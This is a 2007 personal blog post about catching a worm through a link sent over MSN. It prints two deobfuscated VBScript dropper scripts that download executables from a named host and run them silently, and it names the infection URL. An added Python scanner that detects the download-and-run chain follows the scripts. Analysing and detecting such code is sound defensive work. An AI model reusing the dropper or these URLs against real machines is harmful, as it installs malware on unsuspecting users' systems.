Sunday, April 29, 2007

Catching a worm

Peace be upon you

It was a tough day for me. :D I was installing Windows and the other things I usually use on my machine; anyway, the first thing I do after installing Windows is install MSN. I got a message from someone very important to me, and he/she sent me a link:

http://th ecool pics.net/don tclick.jpg

DON'T OPEN THIS LINK, IT HAS THE WORM


I opened the link and noticed it caused a big delay on my machine. I said to myself, wait a second and see what is coming; nothing, the page looked completely normal. After a while I tried to open "Run" and found that it was "Restricted", and so was the Task Manager.
I used "Process Explorer" and found some very strange processes. I got MAD: WORM ON MY MACHINE. Of course I tried all the old tricks, Safe Mode and restoring to a working restore point, but NO WAY; the guy who made it is very clever, he expected what I was going to do and he/she deleted my System Restore application :D. For his/her bad luck, I always have a running copy of Windows that I don't touch and use only for emergencies. :D I got a copy of the System Restore application from it, got back to a clean working point :D, and decided to find out what the hell was going on. :D
I took the link that I mentioned before, downloaded the image and found that it redirects to some other place, which redirects to a very far place. :D At last I got this code:



Of course anyone who knows JavaScript will know the escape and unescape functions. I made a very simple page that unescapes this content and puts it in a textarea, and I found a very nice simple piece of code for encrypting the content; "dF(s)" was the function name. I made another textarea to hold the output of the first textarea, and what I saw shocked me :D; simply, I hadn't updated my Internet Explorer against this stupid exploit.

I got the code that copies the worm to my machine,

and here it is:





< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

Now, after I got this simple JavaScript code that copies a stupid executable and runs it on my machine, I downloaded this file and opened it with Notepad :D (don't laugh, I don't have anything on my HD right now). I found that it is encrypted. I searched for the file name with the beloved Google and found this link that tells a lot about the virus:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T
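As an added example (my own code, not from the original post and not the worm author's), here is a small scanner that turns the analysis steps above into something repeatable: it undoes the JavaScript escape() encoding the way unescape() does, folds the split-up VBScript strings (a1="Ado", a2="db.", str1=a1&a2...) back into literals so "Adodb.Stream" becomes visible, and then checks for the pieces of the download-and-run chain in the script above (the RDS.DataSpace CLSID, Microsoft.XMLHTTP, ADODB.Stream, FileSystemObject, Shell.Application, savetofile, ShellExecute). The sample page is constructed for this example: it has the same shape as the script in the post but uses a placeholder download URL and file name, and the folding only handles plain literal/variable concatenations, not the dF(s) layer, which is not shown on the page.

```python
import re

# Indicators taken from the script in the post. Each one alone is legitimate
# COM usage; the combination (CreateObject through the RDS.DataSpace CLSID,
# an HTTP fetch, a stream saved to disk, then ShellExecute) is the
# download-and-run chain the post describes.
INDICATORS = {
    "rds_dataspace_clsid": r"BD96C556-65A3-11D0-983A-00C04FC29E36",
    "xmlhttp": r"Microsoft\.XMLHTTP",
    "adodb_stream": r"Adodb\.Stream",
    "filesystemobject": r"Scripting\.FileSystemObject",
    "shell_application": r"Shell\.Application",
    "savetofile": r"\.savetofile\b",
    "shellexecute": r"\.ShellExecute\b",
}

# Simple VBScript assignment:  name = <expression>   (not "Set x = ..." or "obj.prop = ...")
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
QUOTED = re.compile(r'^"([^"]*)"$')


def js_unescape(text):
    """Decode %uXXXX and %XX sequences the way JavaScript's unescape() does."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)


def js_escape(text):
    """Encode like JavaScript's escape(); used only to build the constructed sample."""
    keep = set("@*_+-./")
    out = []
    for c in text:
        if c.isalnum() or c in keep:
            out.append(c)
        elif ord(c) < 256:
            out.append("%%%02X" % ord(c))
        else:
            out.append("%%u%04X" % ord(c))
    return "".join(out)


def fold_vbs_strings(script):
    """
    Resolve VBScript string variables built from literals and & concatenation,
    e.g. a1="Ado", a2="db.", str1=a1&a2 -> {"a1": "Ado", "a2": "db.", "str1": "Adodb."}.
    Anything that is not a pure literal/variable chain is left unresolved.
    """
    consts = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        parts = []
        for piece in rhs.split("&"):
            piece = piece.strip()
            q = QUOTED.match(piece)
            if q:
                parts.append(q.group(1))
            elif piece in consts:
                parts.append(consts[piece])
            else:
                parts = None  # a call, a number, or an unknown name: give up on this line
                break
        if parts is not None:
            consts[name] = "".join(parts)
    return consts


def scan_page(page):
    """Decode (unescape), fold split strings, and report which chain parts are present."""
    decoded = js_unescape(page)
    resolved = fold_vbs_strings(decoded)
    haystack = decoded + "\n" + "\n".join(resolved.values())
    findings = {k: bool(re.search(p, haystack, re.I)) for k, p in INDICATORS.items()}
    return findings, resolved


def verdict(findings):
    """Flag the page when fetch, write-to-disk and execute steps all appear together."""
    return all(findings[k] for k in ("xmlhttp", "adodb_stream", "savetofile", "shellexecute"))


# Constructed sample: same structure as the script in the post, but with a
# placeholder download URL and file name instead of the real ones.
SAMPLE_SCRIPT = '''on error resume next
dl = "http://placeholder.invalid/dropper.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
x.Open "GET", dl, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
fname1 = F.BuildPath(F.GetSpecialFolder(2), "PLACEHOLDER.EXE")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
'''
# The page in the post delivered its script escape()-encoded inside unescape();
# rebuild that wrapper so the scanner has to decode it first.
SAMPLE_PAGE = 'document.write(unescape("' + js_escape(SAMPLE_SCRIPT) + '"))'

if __name__ == "__main__":
    found, names = scan_page(SAMPLE_PAGE)
    for k, v in found.items():
        print("%-22s %s" % (k, "FOUND" if v else "-"))
    print("resolved strings:", names)
    print("download-and-run chain:", verdict(found))
```

Running it prints each indicator, the folded variables (str1 and str5 both resolve to Adodb.Stream even though that string never appears whole in the page), and a chain verdict. Treat the verdict as a triage signal, not proof: a legitimate intranet page could use XMLHTTP, but the fetch-write-execute combination through the RDS CLSID is the shape worth quarantining and looking at by hand, exactly as the post did.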

I hope this topic is useful to you, and I want to say one last thing: "DON'T TRUST SOMETHING YOU DON'T SEE; remember there are optical illusions :D, so don't trust anything :D"